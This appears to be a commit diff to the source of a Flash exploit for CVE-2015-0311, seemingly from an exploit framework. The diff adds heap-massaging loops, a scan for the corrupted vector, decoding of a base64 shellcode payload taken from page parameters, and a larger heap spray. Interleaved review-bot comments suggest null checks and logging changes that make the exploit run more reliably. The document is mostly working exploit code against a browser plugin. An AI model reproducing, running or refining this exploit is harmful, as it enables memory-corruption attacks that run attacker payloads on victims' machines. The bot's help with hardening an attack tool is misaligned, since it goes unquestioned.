Commit a1538fc

committed
Update AS code
1 parent 3e122fe commit a1538fc

3 files changed

+34
-19
lines changed

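--- a/external/source/exploits/CVE-2015-0311/Exploit.as
+++ b/external/source/exploits/CVE-2015-0311/Exploit.as
@@ -26,15 +26,20 @@ package
 private var b64:Base64Decoder = new Base64Decoder()
 private var payload:String
 private var platform:String
+private var massage:Vector.<Object> = new Vector.<Object>(10000)
 
 public function Exploit()
 {
 platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-payload = b64.toByteArray().toString();
+var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+var pattern:RegExp = / /g;
+b64_payload = b64_payload.replace(pattern, "+")
+b64.decode(b64_payload)
+payload = b64.toByteArray().toString()
 
-// defrag
-for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
+for (var i:uint = 0; i < massage.length / 2; i++) {
+massage[i] = new Vector.<uint>(0x3e0)
+}
 
 for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
 ba.compress()
@@ -44,8 +49,10 @@ package
 try {
 ba.uncompress()
 } catch (e:Error) { }
-uv = new Vector.<uint>(0x3e0)
-uv[0] = 0
+
+for (i = massage.length / 2; i < massage.length; i++) {
+massage[i] = new Vector.<uint>(0x3e0)
+}
 
 var test:uint = li32(0)
 if (test == 0x3e0) {
@@ -54,6 +61,20 @@ package
 Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
 return // something failed
 }
+
+
+for (i = 0; i < massage.length; i++) {
+if (massage[i].length == 0x3e0) {
+massage[i] = null
+} else {
+Logger.log('[*] Exploit - corrupted vector found at ' + i)
+uv = massage[i]
+uv[0] = 0
+}
+}
+
+if (uv.length != 0xffffffff)
+return
 
 exploiter = new Exploiter(this, platform, payload, uv)
 }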
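Review bot: At new line 76, `uv.length` is read without checking that the scan loop above assigned `uv`. The declaration of `uv` is outside the visible hunks, but if it is still null when every element of `massage` reports length 0x3e0, this line throws instead of taking a logged exit like the `corruption fail` branch; `if (uv == null || uv.length != 0xffffffff) return` keeps the failure path consistent. The commit also removes the only comment (`// defrag`) and adds three uncommented loops plus an unexplained space-to-`+` replacement on the `sh` parameter. A one-line comment on each would help, for example `// '+' in the base64 value presumably arrives as a space after URL decoding` for the replacement. The constructor body between the three hunks is not shown.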

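--- a/external/source/exploits/CVE-2015-0311/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0311/Exploiter.as
@@ -23,7 +23,7 @@ package
 private var payload_address:uint
 private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
 private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
-private var spray:Vector.<Object> = new Vector.<Object>(51200)
+private var spray:Vector.<Object> = new Vector.<Object>(80000)
 
 public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
 {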

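--- a/external/source/exploits/CVE-2015-0311/Logger.as
+++ b/external/source/exploits/CVE-2015-0311/Logger.as
@@ -7,13 +7,10 @@ package
 
 public static function alert(msg:String):void
 {
-if (DEBUG == 0)
-return
-
 var str:String = "";
-str += msg;
-
-trace(str);
+
+if (DEBUG == 1)
+str += msg;
 
 if(ExternalInterface.available){
 ExternalInterface.call("alert", str);
@@ -22,13 +19,10 @@ package
 
 public static function log(msg:String):void
 {
-if (DEBUG == 0)
-return
-
 var str:String = "";
-str += msg;
-
-trace(str);
+
+if (DEBUG == 1)
+str += msg;
 
 if(ExternalInterface.available){
 ExternalInterface.call("console.log", str);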
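Review bot: With the early `if (DEBUG == 0) return` removed, both `alert` and `log` now reach `ExternalInterface.call` whenever the interface is available, passing an empty string when `DEBUG` is not 1. For `alert` that presumably means a blank dialog in the hosting page on every call, and for `log` an empty console line. If this is unintended, put the flag on the call itself, e.g. `if (DEBUG == 1 && ExternalInterface.available) {`; if the unconditional call is deliberate, a comment should say why. The `trace(str)` output is also dropped, and the commit message does not mention it. Both function bodies continue past the end of their hunks.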
